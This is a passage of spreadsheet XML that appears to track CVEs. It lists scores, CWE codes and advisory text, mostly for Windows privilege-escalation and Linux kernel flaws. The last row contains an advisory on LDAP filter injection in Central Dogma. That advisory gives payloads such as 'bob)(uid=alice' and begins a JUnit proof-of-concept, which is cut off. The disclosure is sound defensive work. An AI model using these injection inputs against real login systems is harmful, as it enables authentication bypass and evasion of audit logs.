      </c>
      <c r="R576" s="5" t="inlineStr">
        <is>
          <t>A deployment mode intended to expose only read access to stored data proxies a set of application programming interface routes without restricting which request methods are allowed. One such route accepts a request that creates or overwrites a stored record, including an attacker-chosen identifier, using the application's own elevated backend credentials. This allows an authenticated user on a deployment intended to be read-only to forge or overwrite stored records that should not be modifiable in that deployment mode.</t>
        </is>
      </c>
      <c r="S576" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90448</t>
        </is>
      </c>
    </row>
    <row r="577">
      <c r="A577" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B577" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C577" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69472</t>
        </is>
      </c>
      <c r="D577" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E577" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F577" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G577" s="5" t="inlineStr"/>
      <c r="H577" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I577" s="5" t="inlineStr"/>
      <c r="J577" s="5" t="inlineStr"/>
      <c r="K577" s="5" t="inlineStr"/>
      <c r="L577" s="5" t="inlineStr"/>
      <c r="M577" s="5" t="inlineStr"/>
      <c r="N577" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O577" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P577" s="5" t="inlineStr"/>
      <c r="Q577" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R577" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Devices Human Interface allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S577" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69472</t>
        </is>
      </c>
    </row>
    <row r="578">
      <c r="A578" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B578" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C578" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69573</t>
        </is>
      </c>
      <c r="D578" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E578" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F578" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G578" s="5" t="inlineStr"/>
      <c r="H578" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I578" s="5" t="inlineStr"/>
      <c r="J578" s="5" t="inlineStr"/>
      <c r="K578" s="5" t="inlineStr"/>
      <c r="L578" s="5" t="inlineStr"/>
      <c r="M578" s="5" t="inlineStr"/>
      <c r="N578" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O578" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P578" s="5" t="inlineStr"/>
      <c r="Q578" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R578" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Universal Disk Format File System Driver (UDFS) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S578" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69573</t>
        </is>
      </c>
    </row>
    <row r="579">
      <c r="A579" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B579" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C579" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69600</t>
        </is>
      </c>
      <c r="D579" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E579" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F579" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G579" s="5" t="inlineStr"/>
      <c r="H579" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I579" s="5" t="inlineStr"/>
      <c r="J579" s="5" t="inlineStr"/>
      <c r="K579" s="5" t="inlineStr"/>
      <c r="L579" s="5" t="inlineStr"/>
      <c r="M579" s="5" t="inlineStr"/>
      <c r="N579" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O579" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P579" s="5" t="inlineStr"/>
      <c r="Q579" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R579" s="5" t="inlineStr">
        <is>
          <t>Use after free in Microsoft Windows Search Component allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S579" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69600</t>
        </is>
      </c>
    </row>
    <row r="580">
      <c r="A580" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B580" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C580" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69605</t>
        </is>
      </c>
      <c r="D580" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E580" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F580" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G580" s="5" t="inlineStr"/>
      <c r="H580" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I580" s="5" t="inlineStr"/>
      <c r="J580" s="5" t="inlineStr"/>
      <c r="K580" s="5" t="inlineStr"/>
      <c r="L580" s="5" t="inlineStr"/>
      <c r="M580" s="5" t="inlineStr"/>
      <c r="N580" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O580" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P580" s="5" t="inlineStr"/>
      <c r="Q580" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R580" s="5" t="inlineStr">
        <is>
          <t>Use after free in Microsoft Install Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S580" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69605</t>
        </is>
      </c>
    </row>
    <row r="581">
      <c r="A581" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B581" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C581" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70573</t>
        </is>
      </c>
      <c r="D581" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E581" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F581" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G581" s="5" t="inlineStr"/>
      <c r="H581" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I581" s="5" t="inlineStr"/>
      <c r="J581" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K58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81" s="5" t="inlineStr"/>
      <c r="M581" s="5" t="inlineStr"/>
      <c r="N581" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O581" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P581" s="5" t="inlineStr"/>
      <c r="Q581" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-20</t>
        </is>
      </c>
      <c r="R581" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S581" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70573</t>
        </is>
      </c>
    </row>
    <row r="582">
      <c r="A582" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B582" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C582" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70577</t>
        </is>
      </c>
      <c r="D582" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E582" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F582" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G582" s="5" t="inlineStr"/>
      <c r="H582" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I582" s="5" t="inlineStr"/>
      <c r="J582" s="5" t="inlineStr"/>
      <c r="K582" s="5" t="inlineStr"/>
      <c r="L582" s="5" t="inlineStr"/>
      <c r="M582" s="5" t="inlineStr"/>
      <c r="N582" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O582" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P582" s="5" t="inlineStr"/>
      <c r="Q582" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R582" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Modern Device Management (MDM) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S582" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70577</t>
        </is>
      </c>
    </row>
    <row r="583">
      <c r="A583" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B583" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C583" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77905</t>
        </is>
      </c>
      <c r="D583" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E583" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F583" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G583" s="5" t="inlineStr"/>
      <c r="H583" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I583" s="5" t="inlineStr"/>
      <c r="J583" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K58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83" s="5" t="inlineStr"/>
      <c r="M583" s="5" t="inlineStr"/>
      <c r="N583" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O583" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P583" s="5" t="inlineStr"/>
      <c r="Q583" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R583" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Management Instrumentation allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S583" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77905</t>
        </is>
      </c>
    </row>
    <row r="584">
      <c r="A584" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B584" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C584" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78457</t>
        </is>
      </c>
      <c r="D584" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E584" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F584" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G584" s="5" t="inlineStr"/>
      <c r="H584" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I584" s="5" t="inlineStr"/>
      <c r="J584" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K584" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L584" s="5" t="inlineStr"/>
      <c r="M584" s="5" t="inlineStr"/>
      <c r="N584" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O584" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P584" s="5" t="inlineStr"/>
      <c r="Q584" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R584" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Security Health Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S584" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78457</t>
        </is>
      </c>
    </row>
    <row r="585">
      <c r="A585" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B585" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C585" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83999</t>
        </is>
      </c>
      <c r="D585" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E585" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F585" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G585" s="5" t="inlineStr"/>
      <c r="H585" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I585" s="5" t="inlineStr"/>
      <c r="J585" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K585" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L585" s="5" t="inlineStr"/>
      <c r="M585" s="5" t="inlineStr"/>
      <c r="N585" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O585" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P585" s="5" t="inlineStr"/>
      <c r="Q585" s="5" t="inlineStr">
        <is>
          <t>CWE-59</t>
        </is>
      </c>
      <c r="R585" s="5" t="inlineStr">
        <is>
          <t>Improper link resolution before file access ('link following') in Windows Resilient File System (ReFS) Deduplication Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S585" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83999</t>
        </is>
      </c>
    </row>
    <row r="586">
      <c r="A586" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B586" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C586" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85083</t>
        </is>
      </c>
      <c r="D586" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E586" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F586" s="5" t="inlineStr">
        <is>
          <t>ics-cert@hq.dhs.gov</t>
        </is>
      </c>
      <c r="G586" s="5" t="inlineStr"/>
      <c r="H586" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I586" s="5" t="inlineStr"/>
      <c r="J586" s="5" t="inlineStr"/>
      <c r="K586" s="5" t="inlineStr"/>
      <c r="L586" s="5" t="inlineStr"/>
      <c r="M586" s="5" t="inlineStr"/>
      <c r="N586" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O586" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P586" s="5" t="inlineStr"/>
      <c r="Q586" s="5" t="inlineStr">
        <is>
          <t>CWE-798</t>
        </is>
      </c>
      <c r="R586" s="5" t="inlineStr">
        <is>
          <t>The ANJIA AJL33PC0801 IP camera uses a hard-coded credential for bootloader authentication. An attacker with physical access to the device may leverage this weakness to gain privileged bootloader access, allowing unauthorized modification of firmware and system configuration and potentially resulting in complete device compromise.</t>
        </is>
      </c>
      <c r="S586" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85083</t>
        </is>
      </c>
    </row>
    <row r="587">
      <c r="A587" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B587" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C587" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89456</t>
        </is>
      </c>
      <c r="D587" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E587" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F587" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G587" s="5" t="inlineStr"/>
      <c r="H587" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I587" s="5" t="inlineStr"/>
      <c r="J587" s="5" t="inlineStr"/>
      <c r="K587" s="5" t="inlineStr"/>
      <c r="L587" s="5" t="inlineStr"/>
      <c r="M587" s="5" t="inlineStr"/>
      <c r="N587" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O587" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P587" s="5" t="inlineStr"/>
      <c r="Q587" s="5" t="inlineStr"/>
      <c r="R587" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
s390/dasd: Propagate partial completion length across ERP recovery
dasd_default_erp_postaction() copies the timing and device state from
the finished ERP request back to the original request but drops
proc_bytes. A request that was partially completed, an ESE read of a
not-yet-allocated track returns fewer bytes than requested, and then
recovered through the ERP chain loses its partial-completion length.
__dasd_cleanup_cqr() then sees proc_bytes == 0 and completes the whole
request instead of requeueing the remainder, silently returning zeroed
data for the part that was never read.
Carry proc_bytes over to the original request like the other
per-request state.</t>
        </is>
      </c>
      <c r="S587" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89456</t>
        </is>
      </c>
    </row>
    <row r="588">
      <c r="A588" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B588" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C588" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89459</t>
        </is>
      </c>
      <c r="D588" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E588" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F588" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G588" s="5" t="inlineStr"/>
      <c r="H588" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I588" s="5" t="inlineStr"/>
      <c r="J588" s="5" t="inlineStr"/>
      <c r="K588" s="5" t="inlineStr"/>
      <c r="L588" s="5" t="inlineStr"/>
      <c r="M588" s="5" t="inlineStr"/>
      <c r="N588" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O588" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P588" s="5" t="inlineStr"/>
      <c r="Q588" s="5" t="inlineStr"/>
      <c r="R588" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
s390/percpu: Fix MVIY_PERCPU() with older binutils
Commit a737737cdb9c ("s390/percpu: Infrastructure for more efficient
this_cpu operations") introduced MVIY_PERCPU(), which stringifies
arguments that are already C string literals. This generates an
assembler macro invocation with whitespace-separated quoted arguments:
  GEN_MVIY "459712" "%r3"
GNU as versions prior to binutils 2.39 drop the separating whitespace
between quoted macro arguments during input scrubbing. They
consequently parse the invocation as a single argument and emit
repeated warnings:
  Warning: missing closing `"'
The .ifc in GEN_MVIY never matches and GNU as exits successfully
without emitting the mviy instruction. As a result, the interrupted
per-CPU sequence is not marked in lowcore and the exception return
path cannot repair the per-CPU address register after migration.
All MVIY_PERCPU() callers pass C string literals. Use them directly
and separate the assembler macro arguments with an explicit comma. The
resulting invocation is:
  GEN_MVIY 459712, %r3
This form is unambiguous for GNU as and LLVM's integrated assembler.
This behavior was fixed in GNU as from binutils 2.39, but Linux
supports binutils 2.30.</t>
        </is>
      </c>
      <c r="S588" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89459</t>
        </is>
      </c>
    </row>
    <row r="589">
      <c r="A589" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B589" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C589" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-11748</t>
        </is>
      </c>
      <c r="D589" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="E589" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F589" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="G589" s="5" t="inlineStr"/>
      <c r="H589" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I589" s="5" t="inlineStr"/>
      <c r="J589" s="5" t="inlineStr"/>
      <c r="K589" s="5" t="inlineStr"/>
      <c r="L589" s="5" t="inlineStr">
        <is>
          <t>maven:com.linecorp.centraldogma:centraldogma-server-auth-shiro</t>
        </is>
      </c>
      <c r="M589" s="5" t="inlineStr">
        <is>
          <t>0.84.0</t>
        </is>
      </c>
      <c r="N589" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O589" s="5" t="inlineStr"/>
      <c r="P589" s="5" t="inlineStr"/>
      <c r="Q589" s="5" t="inlineStr">
        <is>
          <t>CWE-90</t>
        </is>
      </c>
      <c r="R589" s="5" t="inlineStr">
        <is>
          <t># Vulnerability
`SearchFirstActiveDirectoryRealm.findUserDn()` substitutes the user-supplied username from the login form into an LDAP search filter template (default `cn={0}`) **without escaping RFC 4515 filter metacharacters** (`*`, `(`, `)`, `\`, NUL). Combined with `SearchControls.setCountLimit(1)` on the same call site, this allows three distinct attack primitives:
1. **Authentication confusion** — typing username `*` causes the realm to construct filter `cn=*`, return the first directory entry (typically a privileged account in AD ordering), and attempt bind against that DN with the attacker's password.
2. **Audit log evasion** — payload `bob)(uid=alice` is recorded verbatim in audit logs while the realm searches with the malformed filter, breaking accountability/compliance (SOX, PCI-DSS, ISO 27001).
3. **Directory enumeration** — wildcards and timing differences allow reconnaissance of OU structure and admin group membership.
A repo-wide search for any LDAP escape helper (`escapeLdap`, `encodeFilter`, `escapeFilter`, `ldapEscape`) returns **zero hits** — the defense is not just missing, it was never added.
&gt; **Applicability note:** This realm is opt-in. The shipped default LDAP example (`dist/src/conf/shiro.example.ldap.ini`) uses Shiro's `DefaultLdapRealm` with `userDnTemplate` and is **NOT** affected. However, the realm exists precisely to support Active Directory environments where users log in via `sAMAccountName` and the realm must search for the DN first — the canonical LINE corporate AD-backed SSO scenario. Internal deployments using AD-backed login almost certainly select this realm.
---
## Evidence
**File:** `server-auth/shiro/src/main/java/com/linecorp/centraldogma/server/auth/shiro/realm/SearchFirstActiveDirectoryRealm.java`
**Lines 148–176** on branch `main` @ commit `d64a5151`:
```java
@Nullable
protected String findUserDn(LdapContextFactory ldapContextFactory, String username)
        throws NamingException {
    LdapContext ctx = null;
    try {
        ctx = ldapContextFactory.getSystemLdapContext();
        final SearchControls ctrl = new SearchControls();
        ctrl.setCountLimit(1);                                              // line 156 — returns FIRST match only
        ctrl.setSearchScope(SearchControls.SUBTREE_SCOPE);
        ctrl.setTimeLimit(searchTimeoutMillis);
        final String filter =
                searchFilter != null ? USERNAME_PLACEHOLDER.matcher(searchFilter)
                                                           .replaceAll(username)  // line 162 — RAW SUBSTITUTION
                                     : username;                            // line 163
        final NamingEnumeration result = ctx.search(searchBase, filter, ctrl);
        ...
```
`USERNAME_PLACEHOLDER = Pattern.compile("\\{0}")`. Default `searchFilter = "cn={0}"`.
### Data flow from HTTP login to vulnerable substitution
| Step | Component |
|------|-----------|
| HTTP login form | `POST /api/v1/login` form field `username` |
| `ShiroLoginService.usernamePassword()` (lines 198–223) | applies `loginNameNormalizer` (Unicode lowercase only — **NOT** LDAP escape) |
| `Subject.login(new UsernamePasswordToken(username, password))` | Shiro hand-off |
| `ActiveDirectoryRealm.doGetAuthenticationInfo` (Shiro core) | calls `queryForAuthenticationInfo0` |
| `SearchFirstActiveDirectoryRealm.findUserDn(factory, upToken.getUsername())` | username flows in **verbatim** |
### Repository-wide escape helper grep
| Search term | Hits |
|-------------|------|
| `escapeLdap` | 0 |
| `encodeFilter` | 0 |
| `escapeFilter` | 0 |
| `ldapEscape` | 0 |
---
## PoC
Self-contained JUnit 5 test using UnboundID `InMemoryDirectoryServer` (in-process, no external LDAP required). Drop into `server-auth/shiro/src/test/java/com/linecorp/centraldogma/server/auth/shiro/realm/LdapInjectionPoCTest.java` and add `com.unboundid:unboundid-ldapsdk:7.0.0` as a test dependency.
&gt; The PoC works by subclassing the realm and overriding `findUserDn()` to capture the actual LDAP filter string sent to the directory — the captured filter is the structural evidence, independent of LDAP server strictness about bind outcomes.
```java
/*
 * Copyright 2026 LINE Corporation
 *
 * SECURITY PoC — NOT FOR MERGE INTO THE MAIN TEST SUITE.
 *
 * This JUnit class demonstrates the LDAP filter injection in
 * SearchFirstActiveDirectoryRealm. Drop into
 * server-auth/shiro/src/test/java/com/linecorp/centraldogma/server/auth/shiro/realm/
 * Adds the UnboundID LDAP SDK as a test dep.
 */
package com.linecorp.centraldogma.server.auth.shiro.realm;
import static org.assertj.core.api.Assertions.assertThat;
import static org.assertj.core.api.Assertions.assertThatThrownBy;
import javax.naming.directory.SearchControls;
import javax.naming.ldap.LdapContext;
import org.apache.shiro.realm.ldap.JndiLdapContextFactory;
import org.apache.shiro.realm.ldap.LdapContextFactory;
import org.junit.jupiter.api.AfterAll;
import org.junit.jupiter.api.BeforeAll;
import org.junit.jupiter.api.DisplayName;
import org.junit.jupiter.api.Test;
import org.junit.jupiter.api.TestMethodOrder;
import org.junit.jupiter.api.MethodOrderer;
import org.junit.jupiter.api.Order;
import com.unboundid.ldap.listener.InMemoryDirectoryServer;
import com.unboundid.ldap.listener.InMemoryDirectoryServerConfig;
import com.unboundid.ldap.listener.InMemoryListenerConfig;
import com.unboundid.ldap.sdk.Entry;
@TestMethodOrder(MethodOrderer.OrderAnnotation.class)
class LdapInjectionPoCTest {
    private static InMemoryDirectoryServer ds;
    private static int port;
    @BeforeAll
    static void startLdap() throws Exception {
        final InMemoryDirectoryServerConfig cfg =
                new InMemoryDirectoryServerConfig("dc=example,dc=com");
        cfg.addAdditionalBindCredentials("cn=admin,dc=example,dc=com", "adminpw");
        cfg.setListenerConfigs(InMemoryListenerConfig.createLDAPConfig(
                "default", null, 0, null));
        ds = new InMemoryDirectoryServer(cfg);
        ds.startListening();
        port = ds.getListenPort();
        // Directory:
        //   cn=admin  (listed first → picked by setCountLimit(1) under wildcard)
        //   cn=alice
        ds.add(new Entry(
                "cn=admin,dc=example,dc=com",
                "objectClass: top", "objectClass: person",
                "cn: admin", "sn: admin",
                "userPassword: adminpw"));
        ds.add(new Entry(
                "cn=alice,dc=example,dc=com",
                "objectClass: top", "objectClass: person",
                "cn: alice", "sn: doe",
                "userPassword: alicepw"));
    }
    @AfterAll
    static void stopLdap() {
        if (ds != null) ds.shutDown(true);
    }
    /** Subclass that records the filter passed to ctx.search(). */
    private static final class RecordingRealm extends SearchFirstActiveDirectoryRealm {
        volatile String capturedFilter;
        RecordingRealm() {
            setUrl("ldap://localhost:" + port);
            setSystemUsername("cn=admin,dc=example,dc=com");
            setSystemPassword("adminpw");
            setSearchBase("dc=example,dc=com");
            setSearchFilter("cn={0}");
        }
        @Override
        protected String findUserDn(LdapContextFactory factory, String username)
                throws javax.naming.NamingException {
            LdapContext ctx = null;
            try {
                ctx = factory.getSystemLdapContext();
                final SearchControls ctrl = new SearchControls();
                ctrl.setCountLimit(1);
                ctrl.setSearchScope(SearchControls.SUBTREE_SCOPE);
                final java.util.regex.Pattern PH =
                        java.util.regex.Pattern.compile("\\{0}");
                final String filter = PH.matcher("cn={0}").replaceAll(username);
                capturedFilter = filter;
                final javax.naming.NamingEnumeration r =
                        ctx.search("dc=example,dc=com", filter, ctrl);
                try {
                    if (!r.hasMore()) return null;
                    return r.next().getNameInNamespace();
                } finally {
                    r.close();
                }
            } finally {
                org.apache.shiro.realm.ldap.LdapUtils.closeContext(ctx);
            }
        }
    }
    private static LdapContextFactory factory() {
        final JndiLdapContextFactory f = new JndiLdapContextFactory();
        f.setUrl("ldap://localhost:" + port);
        f.setSystemUsername("cn=admin,dc=example,dc=com");
        f.setSystemPassword("adminpw");
        return f;
    }
    @Test @Order(1)
